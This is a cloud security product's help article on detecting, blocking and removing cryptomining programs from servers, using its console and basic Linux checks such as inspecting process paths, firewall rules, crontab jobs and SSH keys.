This topic uses common mining programs to describe the characteristics of mining programs and describe how Security Center generates alerts on mining programs, and blocks, traces, and analyzes mining programs.
Mining programs can spread to multiple system services and therefore are difficult to be removed from the system. Mining programs may appear repeatedly and system commands may be replaced with malicious scripts. In this case, the system may accidentally run malicious scripts, such as XOR DDoS. Therefore, you must remove all trojans and persistent webshells from your server within the execution period of a mining program.
For more information about how to determine whether an asset contains mining programs, see How do I know whether my assets contain mining programs.
Use Security Center to manage mining programs
- Log on to the Security Center console.
- In the left-side navigation pane, choose .
- In the alert list, find the specific mining program in the Event column, and then click Processing in the Actions column.If a mining program is detected, Security Center generates a mining program alert.
- To remove a mining program, select Virus removal and Isolate the source file of the process, and then click Process Now. This prevents the mining program from running again.
- For other alerts related to the mining program, for example, mining pool communications,
select Block.Security Center generates policies to prevent servers from visiting mining pools. This ensures that you have sufficient time to manage security events.
- Check alerts on unusual process behavior, and determine whether unusual crontab jobs
- Enable virus blocking.If you fail to remove all mining programs from your server, the virus blocking feature blocks mining programs and prevents them from running. For more information about how to enable virus blocking, see The anti-virus feature.
You can also use Security Center to trace intrusion events and analyze how mining programs intrude into your server.
Use other approaches to manage mining programs
To maximize exploits, mining programs may insert a large number of webshells into the victim server. In this case, viruses may be difficult to be removed.
Assume that you have not purchased Security Center. To detect and manage mining programs, perform the following steps. The following example is based on the Linux operating system.
- Query the file path of the mining program.
ls -l /proc/xxx/exe // xxx specifies the process ID of the mining program.
- Remove the file of the mining program.
- Among the processes that consume most of the CPU resources, find and terminate the mining program.
- Check whether the firewall of your server contains the address of the mining pool
to which the mining program belongs.
- Run the following command to check unusual communication addresses and open ports
that are not required by normal workloads.
iptables -L -n
- Run the following command to remove the address of the mining pool.
- Run the following command to check unusual communication addresses and open ports that are not required by normal workloads.
- Run the following command to check whether crontab jobs exist.
You can handle suspicious crontab job files based on the check results to prevent repeated intrusions.
- Run the following command to check whether the SSH public key contains mining viruses.
This eliminates persistent webshells.
- Check whether mining programs exist on other servers. This eliminates the risk of infecting other servers deployed in the same internal network.